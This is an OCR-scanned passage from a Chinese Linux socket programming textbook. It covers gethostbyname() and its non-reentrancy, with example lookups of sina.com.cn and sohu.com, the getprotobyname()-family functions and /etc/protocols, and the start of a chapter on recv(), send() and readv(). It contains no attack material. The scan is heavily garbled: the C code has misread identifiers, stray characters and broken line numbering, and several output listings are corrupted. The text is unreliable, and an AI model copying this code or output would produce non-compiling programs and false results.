在 IPv4 的 情况 下 为 AF_ INET。 其 返回 值 和 错误 代码 含义 与 函数 gethostbyname() 相 同 。 

#include <netdb .h> 

#include <sys/socket.h> 


struct hostent * 
gethostbyaddr (const void *addr, int len, int type); 


全 注意 : 函数 gethostbyname() 和 gethostbyaddr() 是 不 可 重 入 的 函数 ， 由 于 传 出 的 值 为 一 块 
静态 的 内 存 地址 ， 当 另 一 次 查询 到 来 的 时 候 ， 这 块 区 域 会 被 占用 ， 所 以 在 使 用 的 
时 候 要 小 心 。 


这 
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8.4.3 使 用 主机 名 获取 主机 信息 的 例子 
下 面 的 例子 代码 查询 www.sina.com.cn 的 信息 ， 并 将 主机 的 信息 打印 出 来 。 
1. 获得 主机 名 


字符 类 型 数组 指针 host 的 内 容 为 www.sina.com.cn， 调 用 gethostbyname() 函 数 获得 主 
机 的 信息 ， 结 果 保 存在 hostent 类 型 的 变量 ht 中 。 


#include 
#include 
#include 
#include 


<netdb.h> 
<string.h> 
<stdio.h> 
<arpa/inet.h> 


int main(int argc, char *argv[]) 


上 
char 
stru 
char 
ht = 


host[]="www. sina.com.cn"; /* 将 要 查询 的 主机 域名 */ 
ct hostent *ht=NULL; 
str[30]; 
gethostbyname (host); /* 查 询 主机 www.sina.com.cn*/ 


2. 打印 主机 相关 信息 


根据 变量 ht 传 回 的 信息 ， 一 次 打印 原始 域名 、 主 机 名 称 、 协 议 族 类 型 、IP 地 址 长 度 、 
主机 的 也 地 址 列表 和 主机 的 域名 列表 。 


2 
2 
13 
14 
5 
16 
pl 


18 
让 9 
20 
21 
2 
23 


if(ht){ 
int i = 0; 
printf("get the host:%s addr\n",host); /* 原 始 域 名 */ 
printf ("name:%s\n",ht->h name); /* 名 称 */ 


printf(" 


/* 协 议 族 AF_INET 为 ITPv4 或 者 AF_INET6 为 IPv6*/ 


type:%s\n",ht->h addrtype==AF INET?"AF INET":"AF INET6"); 


printf ("legnth:%d\n",ht->h length); /*IP 地 址 的 长 度 */ 


/* 打 印 IP 地 址 */ 
for (i=0;;i++) { 
if (ht->h addr list[i] != NULL){ /* 不 是 IP 地 址 数组 的 结尾 */ 
printf ("IP:%s\n",inet ntop(ht->h addrtype,ht-> 


nadararist leer SOD /* 打 印 IP 地 址 */ 
} else{ /* 达 到 结尾 */ 
break; /* 退 出 for 循环 */ 
} 
} 
/* 打 印 域名 地 址 */ 
Emo /* 循 环 */ 


if (ht->h aliases[i] != NULL){ /* 没 有 到 达 域 名 数组 的 结尾 */ 


printf ("alias %d:%s\n",i,ht->h aliases[i]); 


/* 打 印 域名 */ 
} elsef /* 结 尾 */ 
break; /* 退 出 循环 */ 


} 
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38 有 

39 

40 return 0; 
41 } 


3. 编译 运行 程序 
将 上 面 的 代码 存 入 文件 ， 编 译 后 运行 ， 其 输出 为 : 


get the host:www.sina.com.cn addr # 获 得 新 浪 主机 的 IP 地 址 


name:ara.sina.com.cn # 名 称 为 : ara.sina.com.cn 
type:AF_INET # 主 机 的 类 型 为 AF_INET 
legnth:4 # 地 址 长 度 为 4 个 字 节 
IP:58.63.236.42 # 主 机 IP 地 址 
IP:58.63.236.43 # 主 机 IP 地 址 
IP:58.63.236.44 # 主 机 IP 地 址 
IP:58.63.236.45 # 主 机 IP 地 址 
IP:58.63.236.46 # 主 机 IP 地 址 
IP:58.63.236.47 # 主 机 IP 地 址 
IP:58.63.236.48 # 主 机 IP 地 址 
IP:58.63.236.49 # 主 机 IP 地 址 
IP:58.63.236.50 # 主 机 IP 地 址 
IP:183.60.187.38 # 主 机 IP 地 址 
IP:183.60.187.39 # 主 机 IP 地 址 
IP:183.60.187.40 # 主 机 IP 地 址 
IP:183.60.187.41 # 主 机 IP 地 址 
IP:183.60.187.42 # 主 机 IP 地 址 
IP:183.60.187.43 # 主 机 IP 地 址 
IP:183.60.187.44 # 主 机 IP 地 址 

alias 0:www.sina.com.cn # 主 机 的 第 一 个 别名 为 www.sina.com. cn 
alias 1:jupiter.sina.com.cn # 主 机 的 第 二 个 别名 为 jupiter.sina.com.cn 


分 析 上 述 输出 结果 知道 : 

口 主机 的 类 型 为 AF_INET 即 IPv4 类 型 的 地 址 ，IP 地 址 的 长 度 为 4， 即 4 个 字 节 
(32 位 ) 。 

口 主机 www.sina.com.cn 的 主机 名 如 下 所 示 。 


www.sina.com.cn 
ara.sina.com.cn 
jupiter.sina.com.cn 


口 主机 的 人 共有 16 个 地 址 ， 如 下 所 示 。 


58.63.236.42 
58.63.236.43 
58.63.236.44 
58.63.236.45 
58.63.236.46 
58.63.236.47 
58.63.236.48 
58.63.236.49 
58.63.236.50 
183.60.187.38 
183.60.187.39 
183.60.187.40 


-a 


YE83- 
下 835 
183. 
3 


8.4.4 
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60.187.41 
60.187.42 
60.187.43 
60.187.44 


函数 gethostbyname() 不 可 重 入 的 例子 


在 8.3.2 节 例 子 的 基础 上 ， 修 改 其 代码 ， 先 调用 gethostbyname() 函 数 获得 www.sina. 
com.cn 的 信息 ,然后 调用 gethostbyname() 函 数 获 得 www.sohu.com 的 信息 ,打印 输出 消息 。 


#include <netdb.h> 
#include <string.h> 
#include <stdio.h> 
#include <arpa/inet.h> 
int main(int argc, char *argv[]) 
人 
struct hostent *ht=NULL; 


char host[]="www.sina.com.cn"; 

char hostl1[]="www.sohu.com"; 

char str[30]; 

struct hostent *htl=NULL, *ht2=NULL; 


htl = gethostbyname (host); 


ht2 = gethostbyname (host1); 
int j = 0; 
for(j = 0;j<2;j++){ 
= 0) 
ht = htl; 
else 
ht =ht2; 


EE 
int i = 0; 


/* 查 询 sina 的 主机 域名 */ 
/* 查 询 sohu 的 主机 域名 */ 


/* 查 询 
"www.sina.com.cn"*/ 
/* 查 询 "www.sohu.com"*/ 


/*sina*/ 


/*sohu*/ 


printf ("get the host:gss addr\n",host); /* 原 始 域 名 */ 


printf ("name:%s\n",ht->h name); 


/* 协 议 族 AF_INET 为 TPv4 或 者 RF_INET6 为 TPv6*/ 


/* 名 称 */ 


printf ("type:%s\n",ht->h addrtype==AF _ INET?"AF INET":"AF INET6"); 
printf ("legnth:%d\n",ht->h length); /*IP 地 址 的 长 度 */ 


/* 打 印 IP 地 址 */ 


for (i=0;;i++) { 


if (ht->h addr list[i] != NULL){ /* 不 是 IP 地址 数组 的 结尾 */ 
printf ("IP:%s\n",inet ntop(ht->h addrtype,ht-> 


h addr list[i],str,30)); 


elset 
break; 
} 
} 
/* 打 印 域名 地 址 */ 


for (i=0; ;i++) {/* 循 环 */ 


/* 打 印 IP 地 址 */ 
/* 达 到 结尾 */ 
/* 退 出 for 循环 */ 


if (ht->h aliases[i] != NULL){ /* 没 有 到 达 域 名 数组 的 结尾 */ 
printf ("alias %d:%s\n",i,ht->h aliases[i]); 


/* 打 印 域名 */ 
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43 } else{ /* 结 尾 */ 

44 break; /* 退 出 循环 */ 
45 } 

46 1 

47 } 

48 } 

49 return 0; 

SO 


将 上 述 代码 保存 到 文件 中 ， 进 行 编译 ， 执 行 后 的 输出 结果 如 下 : 


get the host:www.sina.com.cn addr 
name:ccna0001.h.c3cdn.net 

type:AF INET 

legnth:4 

IP:69.28.61.18 

IP;69.28.61.29 

IP:69.28.61.19 

IP:69.28.61.9 

IP:69.28.61.4 

IP:69.28.61.8 

LE 

LP 1 

IP:209.177.88.16 

IP:209.177.88.14 

alias 0:www.sohu.com 

alias 1:gs.a.sohu.com 

alias 2:static0001.sohu.c3cdn.net 
get the host:www.sina.com.cn addr 
name:ccna0001.h.c3cdn.net 

type:AF INET 

legnth:4 

TPs69.28.61.18 

TIP:6952806L.29 

YE 28S6L EL9 

IP:69.28.61.9 

IERw695283614 

EP:69020.6158 

TP20O LTT 928 

EP:2098177.98%23 

LP:209.177.98.16 

TE:209.177.88514 

alias 0:www.sohu.com 

alias 1:gs.a.sohu.com 

alias 2:static0001.sohu.c3cdn.net 


从 结果 中 可 以 看 出 ，gethostbyname() 函 数 是 不 可 重 入 的 ， 输 出 的 结果 都 是 关于 www. 
sohu.com 的 信息 ， 关 于 www.sina.com.cn 主机 信息 都 已 经 被 www.sohu.com 的 信息 覆盖 了 。 
函数 gethostbyname() 的 不 可 重 入 性 在 进行 程序 设计 的 时 候 要 注意 , 使 用 函数 gethostbyname() 
进行 主机 信息 查询 的 时 候 ， 函 数 返 回 后 ， 要 马上 将 结果 取出 ， 否 则 会 被 后 面 的 函数 调用 过 
程 覆盖 。 


8.5 协议 名 称 处 理 函 数 


为 了 方便 操作 ，Linux 提供 了 一 组 用 于 查询 协议 的 值 及 名 称 的 函数 。 本 节 将 对 相关 的 
函数 及 使 用 方法 和 注意 事项 进行 简单 的 介绍 。 


“0 
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8.5.1 xxxprotoxxx() 函 数 
协议 族 处 理 函 数 有 如 下 几 个 ， 可 以 通过 协议 的 名 称 、 编 号 等 获取 协议 类 型 。 


#include <netdb.h> 

struct protoent *getprotoent (void); /* 从 协议 文件 中 读 取 一 行 */ 
struct protoent *getprotobyname (const char *name);/* 从 协议 文件 中 找到 匹配 项 */ 
struct protoent *getprotobynumber (int proto); /* 按 照 协 议 类 型 的 值 获取 匹配 项 */ 
void setprotoent (int stayopen); /* 设 置 协议 文件 打开 状态 */ 

void endprotoent (void); /* 关 闭 协 议 文件 */ 


上 面 的 函数 对 文件 /etc/protocols 中 的 记录 进行 操作 ， 文 件 中 记录 了 协议 的 名 称 、 值 和 
别名 等 值 。 与 结构 struct protoent 的 定义 一 致 。 结 构 protoent 的 定义 如 下 : 


struct protoent 


{ 


char *p_name; /* 协 议 的 官方 名 称 */ 
char **#p_aliases; /* 别 名 列表 */ 
int p_ proto; /* 协 议 的 值 */ 


Ys 


口 成 员 p_name 为 指向 协议 名 称 的 指针 。 

口 成 员 p_aliases 是 指向 别名 列表 的 指针 ， 协 议 的 别名 是 一 个 字符 串 。 

口 成 员 p_proto 是 协议 的 值 。 

如 图 8.10 所 示 , 成 员 p_name 指 向 一 块 内 存 , 其 中 存放 了 协议 的 官方 名 称 。 成 员 p_aliases 
指向 的 区 域 是 一 个 列表 ， 存 放 了 协议 的 别名 ， 最 后 以 NULL 结尾 。 


结构 struct protoent 


协议 的 名 称 
p_name | 
二 EE 协议 别名 0 
协议 的 值 | p_aliases Ia 
| 协议 别名 1 


Pp_proto 
协议 别名 2 


NULL 


图 8.10 ”结构 protoent 示意 图 


口 函数 getprotoent() 从 文件 /etc/protocols 中 读 取 一 行 并 且 返 回 一 个 指向 structure 
protoent 的 指针 ， 包 含 读 取 一 行 的 协议 。 需 要 事先 打开 文件 /etc/protocols。 

口 函数 getprotobyname() 按 照 输入 的 协议 名 称 name, 匹配 文件 /etc/protocols 中 的 选项 ， 
返回 一 个 匹配 项 。 

口 函数 getprotobynumber() 按 照 输入 的 协议 值 proto, 匹配 文件 /etc/protocols 中 的 选项 ， 


se 


日 


日 
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返回 一 个 匹配 项 。 


函数 setprotoent() 打 开 文件 /etc/protocols， 当 stayopen 为 1 的 时 候 ， 在 调用 函数 
getprotobyname() 或 者 函数 getprotobynumber() 查 询 协议 时 ， 并 不 关闭 文件 。 
函数 endprotoent() 关 闭 文件 /etc/protocols。 


函数 getprotoent()、getprotobyname() 和 getprotobynumber() 在 调用 成 功 时 ， 返 回 一 个 指 
向 结构 struct protoent 的 指针 ;， 失 败 时 ， 返 回 NULL。 


8.5.2 ”使 用 协议 族 函 数 的 例子 


如 下 的 例子 按照 名 称 查询 一 组 协议 的 项 目 ， 


首先 用 setprotoent(1) 打 开 文 件 


/etc/protocols ， 然 后 使 用 函数 getprotobyname() 查 询 函 数 并 显示 出 来 ， 最 后 使 用 函数 
endprotoent() 关 闭 文件 /etc/protocols。 代 码 如 下 所 示 。 


1. 显示 协议 项 目 函 数 display_protocol() 
display_protocol() 函 数 将 一 个 给 定 结构 protoent 中 的 协议 名 称 打印 出 来 , 并 判断 是 否 有 


别名 ， 将 本 协议 所 有 相关 的 别名 都 打印 出 来 ， 最 后 打印 协议 的 值 。 


01 
02 
03 
04 
05 
06 
07 
08 
09 
10 
El 
2 
13 
14 
1 
16 
ET 
18 
9 


#include <netdb.h> 
#include <stdio.h> 


/* 显示 协议 项 目的 函数 */ 


void display protocol (struct protoent *pt) 


{ 


int i = 0; 
if (pt){ 
printf ("protocol name:%s,",pt->p_ name); 
if (pt->p_aliases){ 
printf ("alias name:"); 
while (pt->p_aliases[i]){ 
printf("%s ",pt->p aliases[i]); 
二 证 
’ 
1 
printf(",value:%d\n",pt->p_proto); 


2. 主 函 数 main() 
在 主 函 数 中 ， 建 立 一 个 要 查询 协议 名 称 的 数组 ， 使 用 函数 getprotobyname() 进 行 查询 。 


int main(int argc, char *argv[]) 


{ 


int i = 0; 


const char *const protocol name[]={ 
wip", 

"icmp", 

"igmp", 

"ggp™, 


/+* 合 法 的 指针 */ 
/* 协 议 的 官方 名 称 */ 
/* 别 名 不 为 空 */ 

/* 显 示 别 名 */ 

/* 列 表 没 到 结尾 */ 
/* 显 示 当 前 别名 */ 
/+ 下 一 个 别名 */ 


/* 协 议 值 */ 


/* 要 查询 的 协议 名 称 */ 
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29 "ipencap", 
30 mst", 
3 bh rhe 
针 芝 "egp", 
33 "igp", 
34 De ea 
35 Woden 
36 "hmp", 
加 于 "xns-idp", 
38 "rdp", 
39 =tD 人 A 
40 ED 
41 "ddp", 
42 "idpr-cmtp", 
43 Jo ed be 
44 "ipv6-route", 
45 "ipv6-frag”;y 
46 Pldrp”, 
47 a 
48 wgre", 
49 "esp", 
50 "hy 
5 akip”y 
与 受 "ipv6-icmp", 
5 人 3 "ipv6é-nonxt", 
54 sipv6-Opts", 
55 三 SBD 上 7 
56 "vmtp", 
5 了 "eigrp", 
58 MopE"s 
59 Wb 
60 eh 
61 "etherip", 
62 "encap", 
63 "pim", 
64 "ipcomp", 
65 bl le 
66 2 
67 全 全 全 
68 人 
69 1 
70 NULL}; 
El 
4 setprotoent (1); 
/* 在 使 用 函数 getprotobyname () 时 不 关闭 文件 /etc/protocols*/ 
73 while (protocol name[i]!=NULL){ /* 没 有 到 数组 protocol_name 的 结尾 */ 
74 struct Protoent *pt = getprotobyname((const char*) gprotocol_ 
name[i] [0]); /* 查 询 协议 */ 
75 if (pt){ /* 成 功 *#/ 
76 display protocol (pt); /* 显 示 协 议 项 目 */ 
77 } 
78 了 ++ 7 /* 移 到 数组 protocol_name 的 下 一 个 */ 
了 9 ] 
80 endprotoent () /* 关 闭 文件 /etc/protocols*/ 
81 return 0; 
2 


如 表 8.1 所 示 ， 程 序 的 运行 结果 如 下 : 


sn 
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表 8.1 协议 名 称 和 值 的 对 应 表 


协议 名 称 协议 别名 协议 的 值 协议 名 称 协议 别名 协议 的 值 
ip IP GRE 47 
icmp ICMP IPSEC-ESP 50 
igmp IPSEC-AH 51 
ggp skip SKIP 至 
ipencap IP-ENCAP ipv6-icmp IPv6-ICMP 58 
st ST ipv6-nonxt IPv6-NoNxt 59 
tcp TCP ipv6-opts IPv6-Opts 60 
egp EGP RSPF、 CPHB 73 


igp IGP VMTP 81 


pup PUP 2 i VMTP 88 


udp spf EIGRP 89 
hmp ax. AX.25 3 


xns-idp IPIP 94 


protocol name:ip,alias name:IP ,value:0 

protocol name:icmp,alias name:ICMP ,value:1 

protocol name:igmp,alias name:IGMP ,value:2 

protocol name:ggp,alias name:GGP ,value:3 

protocol name:ipencap,alias name:IP-ENCAP ,value:4 
protocol name:st,alias name:ST ,value:5 

protocol name:tcp,alias name:TCP ,value:6 

protocol name:egp,alias name:EGP ,value:8 

protocol name:igp,alias name:IGP ,value:9 

protocol name:pup,alias name:PUP ,value:12 

protocol name:udp,alias name:UDP ,value:17 

protocol name:hmp,alias name:HMP ,value:20 

protocol name:xns-idp,alias name:XNS-IDP ,value:22 
protocol name:rdp,alias name:RDP ,value:27 

protocol name:iso-tp4,alias name:ISO-TP4 ,value:29 
protocol name:xtp,alias name:XTP ,value:36 

protocol name:ddp,alias name:DDP ,value:37 

Protocol name:idpr-cmtp,alias name:IDPR-CMTP ,value:38 
Protocol name:ipv6,alias name:IPv6 ,value:41 

Protocol name:ipv6-route,alias name:IPv6-Route ,value:43 
protocol name:ipv6-frag,alias name:IPv6-Frag ,value:44 


.234 。 


protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
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name:idrp,alias name:IDRP ,value:45 
name:rsvp,alias name:RSVP ,value:46 
name:gre,alias name:GRE ,value:47 
name:esp,alias name:IPSEC-ESP ,value:50 
name:ah,alias name:IPSEC-AH ,value:51 
name:skip,alias name:SKIP ,value:57 
name:ipv6-icmp,alias name:IPv6-ICMP ,value:58 
name:ipv6-nonxt,alias name:IPv6-NoNxt ,value:59 
name:ipv6-opts,alias name:IPv6-Opts ,value:60 
name:rspf,alias name:RSPF CPHB ,value:73 
name:vmtp,alias name:VMTP ,value:81 
name:eigrp,alias name:EIGRP ,value:88 
name:ospf,alias name:OSPFIGP ,value:89 
name:ax.25,alias name:AX.25 ,value:93 
name:ipip,alias name:IPIP ,value:94 
name:etherip,alias name:ETHERIP ,value:97 
name:encap,alias name:ENCAP ,value:98 
name:pim,alias name:PIM ,value:103 
name:ipcomp,alias name:IPCOMP ,value:108 
name:vrrp,alias name:VRRP ,value:112 
name:l2tp,alias name:L2TP ,value:115 
name:isis,alias name:ISIS ,value:124 
name:sctp,alias name:SCTP ,value:132 
name:fc,alias name:FC ,value:133 


8.6 小 结 


本 章 介绍 了 字 节 序 转换 函数 和 主机 信息 获取 的 函数 ， 并 介绍 了 通过 协议 的 名 称 和 值 来 
获取 协议 选项 的 方法 。 地 址 转换 函数 和 获取 主机 信息 的 函数 有 一 部 分 是 不 可 重 入 的 ， 在 进 
行程 序 设计 的 时 候 要 注意 ， 函 数 调用 完毕 后 及 时 将 结果 取出 。 目 前 的 gethostbyname() 和 
gethostbyaddr() 函 数 已 经 不 推荐 使 用 ， 有 代替 函数 出 现 ， 可 以 用 于 IPv4 和 IPv6， 并 且 是 线 
程 安全 的 ， 即 getaddrinfo() 和 getnameinfo() 函 数 ， 参 见 第 15 章 的 IPv6 部 分 ， 其 中 进行 了 详 


细 的 介绍 。 
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网 络 数据 能 够 正常 地 到 达 用 户 并 被 用 户 接收 是 进行 网 络 数据 传输 的 基本 目的 。 网 络 数 
据 的 接收 和 发 送 有 多 种 方案 ， 例 如 直接 接收 和 发 送 数据 、 通 过 向 量 接收 和 发 送 、 通 过 消息 
接收 和 发 送 等 。 本 章 将 对 多 种 数据 传输 方式 进行 介绍 ， 并 介绍 多 种 IO 模型 ， 还 将 对 select 
和 poll 的 概念 和 使 用 进行 详细 的 解释 。 主 要 包括 以 下 内 容 : 
口 介绍 常用 的 IO 函数 recv()/send()、readv()/writev()、recvmsg()/sendmsg()， 并 讲解 函 
数 的 主要 应 用 的 场合 ; 
口 用 几 个 简单 的 例子 ， 说 明 如 何 使 用 上 述 函 数 进行 程序 的 设计 ; 
口 介绍 常用 的 几 种 IO 模型 ， 以 图 形式 的 方法 形象 地 进行 说 明 ; 
口 介绍 select0 和 pselect() 函 数 ， 如 何 使 用 这 两 个 函数 进行 文件 描述 符 读 写 条 件 的 
监视 ; 
口 简单 介绍 函数 polO0 和 ppoll(0) 的 含义 、 使 用 和 区 别 ; 
口 以 简单 的 例子 介绍 非 阻塞 编 程 的 方法 。 


9.1 IO 函 数 


Linux 操作 系统 中 的 IO 函数 主要 有 read()、write()、recv()、send()、recvmsg()、sendmsg()、 
readv()、writev()。 本 节 将 对 上 述 的 主要 函数 进行 介绍 ， 其 中 read0 和 write0) 函 数 在 前 面 已 
经 介绍 过 。 


9.1.1 使 用 recv() 函 数 接收 数据 


recv() 函 数 用 于 接收 数据 ， 函 数 原型 如 下 。recv() 函 数 从 套 接 字 s 中 接收 数据 放 到 缓冲 
区 buf 中 , buf 的 长 度 为 len, 操作 的 方式 由 flags 指定 。 第 1 个 参数 s 是 套 接口 文件 描述 符 ， 
它 是 由 系统 调用 socket() 返 回 的 。 第 2 个 参数 buf 是 一 个 指针 , 指向 接收 网 络 数据 的 缓冲 区 。 
第 3 个 参数 len 表示 接收 缓冲 区 的 大 小 ， 以 字 节 为 单位 。 

#include <sys/types.h> 

#include <sys/socket.h> 

ssize 七 recv(int s, void*buf, size t len, int flags); 

recv() 函 数 的 参数 flags 用 于 设置 接收 数据 的 方式 ， 可 选择 的 值 及 含义 在 表 9.1 中 列 出 
(flags 的 值 可 以 是 表 中 值 的 按 位 或 生成 的 复合 值 )。 例 如 ， 经 常 使 用 的 MSG_DONTWAIT 
进行 接收 数据 的 时 候 ， 不 进行 等 待 ， 即 使 没有 数据 也 立刻 返回 ， 即 此 时 的 套 接 字 是 非 阻塞 
操作 。 
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表 9.1 recv() 函 数 flags 的 值 及 含义 
值 含义 

MSG DONTWAIT 非 阻塞 操作 ， 立 刻 返 回 ， 不 等 待 
MSG ERRQUEUE 错误 消息 从 套 接 字 错误 队列 接收 
MSG OOB 接收 外 数据 数据 
MSG PEEK 查看 数据 ， 不 进行 数据 缓冲 区 的 清空 
MSG TRUNC 返回 所 有 的 数据 ， 即 使 指定 的 缓冲 区 过 小 


MSG WAITALL 


等 待 所 有 消息 


表 9.1 中 的 值 具体 含义 如 下 所 述 。 


口 


MSG DONTWAIT: 这 个 标志 将 单个 IO 操作 设 为 非 阻 塞 方式 ， 而 不 需要 在 套 接 字 


上 打开 非 阻塞 标志 ， 执 行 IO 操作 ， 然 后 关闭 非 阻塞 标志 。 


口 MSG_ERRQUEUE: 该 错误 的 传输 依赖 于 所 使 用 的 协议 。 

口 MSG_ OO0B: 这 个 标志 可 以 接收 带 外 数据 ， 而 不 是 接收 一 般 数据 。 

口 MSG _PEEK: 这 个 标志 用 于 查看 可 读 的 数据 ,在 recv() 函 数 执行 后 ， 内 核 不 会 将 这 
些 数据 丢弃 。 

口 MSG_TRUNC: 在 接收 数据 后 ， 如 果 用 户 的 缓冲 区 大 小 不 足以 完全 复制 缓冲 区 中 


的 数据 ， 贝 
口 


上 将 数据 截断 ， 仅 靠 复制 用 户 缓冲 区 大 小 的 数据 。 其 他 的 数据 会 被 丢弃 。 


MSG_WAITALL: 这 个 标志 告诉 内 核 在 没有 读 到 请 求 的 字 节 数 之 前 不 使 读 操作 返 


回 。 如 果 系统 支持 这 个 标志 ， 可 以 去 掉 readn() 函 数 而 用 下 面 的 代替 : 


#define readn(fd, ptr,n) recvl(fd, ptr,n,MSG WAITALL). 


即使 设置 了 M 


(c) 在 套 接 字 上 发 生 和 


SG_WAITALL， 如 果 发 生 以 下 情况 : (a) 捕获 一 个 信号 ，(b ) 连接 终止 ， 


普 误 ， 这 个 函数 返回 的 字 节 数 仍然 会 比 请 求 的 少 。 当 指定 WAITALL 


标志 时 , 函数 会 复制 与 用 户 指定 的 长 度 相等 的 数据 。 如 果 内 核 中 的 当前 数据 不 能 满足 要 求 ， 
会 一 直 等 待 直到 数据 足够 的 时 候 才 返回 。 

函数 recv() 的 返回 值 是 成 功 接收 到 的 字 节 数 , 当 返 回 值 为 -1 时 错误 发 生 , 可 以 查看 errno 
获取 错误 码 ， 参 见 表 9.2。 当 另 一 方 使 用 正常 方式 关闭 连接 的 时 候 返 回 值 为 0， 例 如 调用 
close() 函 数 关闭 连接 。 


表 9.2 recv() 函 数 errno 的 值 及 含义 


值 含义 
AA 套 接 字 定 义 为 非 阻塞， 而 操作 采用 了 阻塞 方式 ， 或 者 定义 的 超时 时 间 已 经 达到 却 
没有 接收 到 数据 

EBADF 参数 s 不 是 合法 描述 符 
ECONNREFUSED | 远程 主机 不 允许 此 操作 
EFAULT 接收 缓冲 区 指针 在 此 进程 之 外 
EINTR 接收 到 中 断 信 
EINVAL 传递 了 不 合法 
ENOTCONN 套 接 字 s 表示 流 式 套 接 字 ， 此 套 接 字 没有 连接 
ENOTSOCK 参数 不 是 套 接 字 描述 符 

recv() 函 数 通 常用 于 TCP 类 型 的 套 接 字 ，UDP 使 用 recvfrom() 函 数 接收 数据 ， 当 然 在 


.237 。 
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数据 报 套 接 字 绑 定 地 址 和 端口 后 ， 也 可 以 使 用 recv0) 函 数 接收 数据 。 

recv() 函 数 从 内 核 的 接收 缓冲 区 中 复制 数据 到 用 户 指定 的 缓冲 区 , 当 内 核 中 的 数据 比 指 
定 的 缓冲 区 小 时 ， 一 般 情 况 下 (没有 采用 MSG_WAITALL 标志 ) 会 复制 缓冲 区 中 的 所 有 
数据 到 用 户 缓冲 区 ， 并 返回 数据 的 长 度 。 当 内 核 接 收 缓冲 区 中 的 数据 比 用 户 指 定 的 多 时 ， 
会 将 用 户 指 定 长 度 len 的 接收 缓冲 区 中 的 数据 复制 到 用 户 指定 地 址 ， 其 余 的 数据 需要 下 次 
调用 接收 函数 的 时 候 再 复制 ， 内 核 在 复制 用 户 指定 的 数据 之 后 ， 会 销毁 已 经 复制 完毕 的 数 
据 ， 并 进行 调整 。 


9.1.2 ”使 用 send() 函 数 发 送 数据 
send() 函 数 用 于 发 送 数据 ， 函 数 原型 如 下 : 


#include <sys/types.h> 

#include <sys/socket.h> 

ssize t send(int s, const void*buf, size t len, int flags); 

send() 函 数 将 缓冲 区 buf 中 大 小 为 len 的 数据 ， 通 过 套 接 字 文件 描述 符 按照 flags 指定 
的 方式 发 送出 去 。 其 中 的 参数 含义 与 recv 中 的 含义 一 致 , 它 的 返回 值 是 成 功 发 送 的 字 节 数 。 
由 于 用 户 缓冲 区 buf 中 的 数据 在 通过 send(0) 函 数 进 行 发 送 的 时 候 ， 并 不 一 定 能 够 全 部 发 送 
出 去 , 所 以 要 检查 send() 函 数 的 返回 值 , 按照 与 计划 发 送 的 字 节 长 度 len 是 否 相等 来 判断 如 
何 进 行 下 一 步 操 作 。 

当 send() 函 数 的 返回 值 小 于 len 的 时 候 ， 表 明 缓冲 区 中 仍然 有 部 分 数据 没有 成 功 发 送 ， 
这 时 需要 重新 发 送 剩余 部 分 的 数据 。 通 常 的 剩余 数据 发 送 方法 是 对 原来 buf 中 的 数据 位 置 
进行 偏 黎 ， 偏 移 的 大 小 为 已 发 送 成 功 的 字 节 数 。 

函数 send0) 发 生 错 误 的 时 候 返 回 值 为 -1, 这 时 可 以 查看 errno 获取 错误 码 , 参见 表 9.3。 
当 另 一 方 使 用 正常 方式 关闭 连接 的 时 候 返 回 值 为 0， 例如 调用 close() 函 数 关 闭 连 接 。 


表 9.3 send() 函 数 errno 的 值 及 含义 


值 含义 


套 接 字 定 义 为 非 阻 塞 ， 而 操作 采用 了 阻塞 方式 ， 或 者 定义 的 超时 时 间 已 


EAGAIN EWOULDBLOCK | 经 达到 却 没有 接收 到 数据 
EBADF 参数 s 不 是 合法 描述 符 
ECONNREFUSED 远程 主机 不 允许 此 操作 

EFAULT 接收 缓冲 区 指针 在 此 进程 之 外 
EINTR 在 发 送 数据 之 前 接收 到 中 断 信号 


EINVAL 
ENOTCONN 


ENOTSOCK 


传递 了 不 合法 参数 


参数 不 是 套 接 字 描 述 符 


套 接 字 s 表示 流 式 套 接 字 ， 此 套 接 字 没有 连接 


ECONNRESET 连接 断 开 

EDESTADDRREQ 套 接 字 没 有 处 于 连接 状态 
ENOBUFS 发 送 缓冲 区 已 满 

ENOMEM 没有 足够 内 存 

EOPNOTSUPP 设 定 的 发 送 方式 flag 没有 实现 
EPIPE 套 接 字 已 经 关闭 

EACCES 套 接 字 不 可 写 


“a 
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函数 send() 只 能 用 于 套 接 字 处 于 连接 状态 的 描述 符 ， 之 前 必须 用 connect() 函 数 或 者 其 
他 函数 进行 连接 。 对 于 send() 函 数 和 write() 函 数 之 间 的 差别 是 表示 发 送 方 式 的 flag, 当 flag 
为 0 时, send() 函 数 和 write() 函 数 完全 一 致 .而 且 send(s,buf,len,flags) 与 sendto(s,buflen,flags， 
NULL,0) 是 等 价 的 。 


9.1.3 ”使 用 readv() 函 数 接收 数据 
readv(0 函 数 可 用 于 接收 多 个 缓冲 区 数据 ， 函 数 原型 如 下 所 示 。readv0 函 数 从 套 接 字 描 
述 符 s 中 读 取 count 块 数据 放 到 缓冲 区 向 量 vector 中 。 


#include <sys/uio.h> 
ssize t readv(int s, const struct iovec*vector, int count) 


readv() 函 数 的 返回 值 为 成 功 接收 到 的 字 节 数 ， 当 为 -1 时 错误 发 生 ， 可 以 查看 errno 获 
取 错 误 码 ， 参 见 表 9.4。 


表 9.4 readv() 函 数 errno 的 值 及 含义 


值 含义 
BG 套 接 字 定义 为 非 阻塞 ， 而 操作 采用 了 阻塞 方式 ， 或 者 定义 的 超时 时 间 已 经 达到 却 
没有 接收 到 数据 
EBADF 参数 s 不 是 合法 描述 符 
ECONNREFUSED | 远程 主机 不 允许 此 操作 
EFAULT 接收 缓冲 区 指针 在 此 进程 之 外 
EINTR 接收 到 中 断 信 和 号 
| iov_len 超出 了 ssize t 类 型 的 范围 , 或 者 count 参数 小 于 0 或 者 大 于 可 允许 最 
ENOTCONN 套 接 字 s 表示 流 式 套 接 字 ， 此 套 接 字 没有 连接 
ENOTSOCK 参数 不 是 套 接 字 描述 符 


参数 vector 为 一 个 指向 向 量 的 指针 ， 结 构 struct iovec 在 文件 <sys/uio.h> 中 定义 : 
struct iovec { 
void*iov base; /* 向 量 的 缓冲 区 地 址 */ 
size t iov len; /* 向 量 缓冲 区 的 大 小 , 以 字 节 为 单位 */ 
Di 
在 调用 readv0 函 数 的 时 候 必须 指定 iovec 的 iov_base 的 长 度 ， 将 值 放 到 成 员 iov_len 
中 。 参数 vector 指向 一 块 结构 vector 的 内 存 , 大 小 由 count 指定 , 如 图 9.1 所 示 , 结构 vector 
